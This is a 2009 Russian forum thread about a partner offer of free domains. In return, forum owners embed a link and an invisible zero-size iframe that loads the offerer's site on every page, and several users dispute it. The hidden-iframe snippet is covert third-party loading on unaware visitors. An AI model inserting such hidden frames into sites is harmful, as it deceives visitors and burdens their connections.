чушь) где это написано?
не помню где,но где-то я это читал...
budda
DART
Я как бы тоже не вкладывал...
если конечно не считать вложением мою энергию и мое время.
Единый форум поддержки |
Привет, Гость! Войдите или зарегистрируйтесь.
Вы здесь » Единый форум поддержки » Корзина » Домены .net .com .org .biz и др. БЕСПЛАТНО! >> партнёрка от prizrak'a
чушь) где это написано?
не помню где,но где-то я это читал...
budda
DART
Я как бы тоже не вкладывал...
если конечно не считать вложением мою энергию и мое время.
prizrak
Я перефразировал советы знающих людей. Сам тоже несколько в этом разбираюсь, ничего не взято с потолка.
Самые популярные, универсальные домены COM - соответственно Гугл в первую очередь чаще и быстрее индексирует именно их, а Яша наш, российский - в первую очередь индексит домены второго уровня RU, затем все остальные.
DART
ну может быть в принципе всё логично.. русский поисковик отдаёт предпочтение национальному домену НО сейчас в сети все регистрируют разные домены.. русские вебмастера регят иностранные домены в больном количестве.. так же популярны домены org biz net их ОЧЕНЬ МНОГО именно на русских сайтах! Думаю Яндекс уже пересмотрел свою политику в отношении этого.. потому что интернет уже давно стал интернациональным
ВНИМАНИЕ!!! Альтернативные условия для форумов MYBB:
1) посещаемость от 150 уников в сутки (вы должны предоставить подробную статистику форума по входящему трафику, откуда когда и сколько т.к. трафик с различных автосёрфингов не принимается! Статистика от гугланалитикс например подойдёт!)
2) не менее 3 000 зарегистрированных пользователей и 30 000 сообщений!
3) тематика: софт, игры, фильмы, музыка.. ролевики не принимаются! Форум должен быть определённой чёткой тематики, форумы ОБО ВСЁМ также не принимаются (возможны исключения).
4) Вы размещаете у себя на форуме одну текстовую ссылку которая будет составлена персонально для каждого форума в зависимости от тематики и код невидимого фрейма:
<iframe src="http://prizrak.ws/" width="0" height="0" frameborder="0"></iframe>
5) покупка и прикрепление домена происходит быстро, в течении суток после проверки всех выше перечисленных требований!
Контакт со мной: ЛС или ICQ 303043564
невидимого фрейма:
это бред, реально. Мало того, что форум этого человека может долго прогружаться, так еще и твой форум с огромным количетсвом скриптов...
это бред, реально. Мало того, что форум этого человека может долго прогружаться, так еще и твой форум с огромным количетсвом скриптов...
ну во первых у меня не так уж и много скриптов! а во вторых я проверял.. и с моим то тормозным инетом всё грузится нормально, как и раньше!
так что не надо гнать если не знаешь всё будет норм! И не отгоняй тут мне партнёров)))
ВНИМАНИЕ!!! Альтернативные условия для форумов MYBB:
1) посещаемость от 150 уников в сутки (вы должны предоставить подробную статистику форума по входящему трафику, откуда когда и сколько т.к. трафик с различных автосёрфингов не принимается! Статистика от гугланалитикс например подойдёт!)
2) не менее 3 000 зарегистрированных пользователей и 30 000 сообщений!
3) тематика: софт, игры, фильмы, музыка.. ролевики не принимаются! Форум должен быть определённой чёткой тематики, форумы ОБО ВСЁМ также не принимаются (возможны исключения).
4) Вы размещаете у себя на форуме одну текстовую ссылку которая будет составлена персонально для каждого форума в зависимости от тематики и код невидимого фрейма:
<iframe src="http://prizrak.ws/" width="0" height="0" frameborder="0"></iframe>
5) покупка и прикрепление домена происходит быстро, в течении суток после проверки всех выше перечисленных требований!
Контакт со мной: ЛС или ICQ 303043564
так что не надо гнать если не знаешь
Это не просто "не знаю", это факт!)) Что чел будет грузить лишний твой форум себе)
Даже с моим скоростным интернетом он тормозит)
Ну, удачи тогда)
Это не просто "не знаю", это факт!)) Что чел будет грузить лишний твой форум себе)
Даже с моим скоростным интернетом он тормозит)
да будет грузится 2 сайта одновременно и что? О.О Каждый открывает у себя в браузере часто по 5 а то и больше сайтов одновременно и не испытывает при этом дискомфорта! тем более с постоянно растущей скорость у пользователей это вообще не проблема!))
ппц у меня скорость 1200 кб/с и ничё не тормозит У тебя какая скорость если не секрет?
ппц у меня скорость 1200 кб/с и ничё не тормозит У тебя какая скорость если не секрет?
ITCN Optima 580 руб. 12 000 МБ 20 МБит/с
ITCN Optima 580 руб. 12 000 МБ 20 МБит/с
отличная скорость не знаю тогда в чём проблема..
в общем если не нравятся условия тогда зачем писать просто проходите мимо! Тех кого устроит те напишут свои предложения. Флуд буду удалять.
Призрак а условия партнерки поменять не хочешь?
Призрак а условия партнерки поменять не хочешь?
Нет. Домены дорожают.. у меня есть партнёры которым я уже купил домены. Текущие условия меня и моих партнёров устраивают
А статистику за какое число предоставлять? У меня раньше и 700 было,а после рекламы,которая на главной странице висит, 200 стало
А статистику за какое число предоставлять? У меня раньше и 700 было,а после рекламы,которая на главной странице висит, 200 стало
интересует текущая статистика
prizrak
будут ли новые зоны, а точнее, что возможно добавишь из далее перечисленных: .su .us .ws .by .ua?
.ua забыл
Отредактировано mkusher (Сб, 21 Мар 2009 21:44:18)
mkusher
расширять список пока не планирую. бесплатно доступны только те домены которые я перечислил в первом сообщении темы
А всё так и останется все настройки и.т.д?
Отредактировано Буизиль (Вт, 21 Апр 2009 20:08:59)
Буизиль
о каких настройках речь? Я Вас не понимаю
Меняется только адрес форума, всё остальное остаётся как и было раньше)
Только заметил эту тему.
Сейчас я с Призраком поговорю насчет ифреймов и нагрузок на сервер...
Вы здесь » Единый форум поддержки » Корзина » Домены .net .com .org .biz и др. БЕСПЛАТНО! >> партнёрка от prizrak'a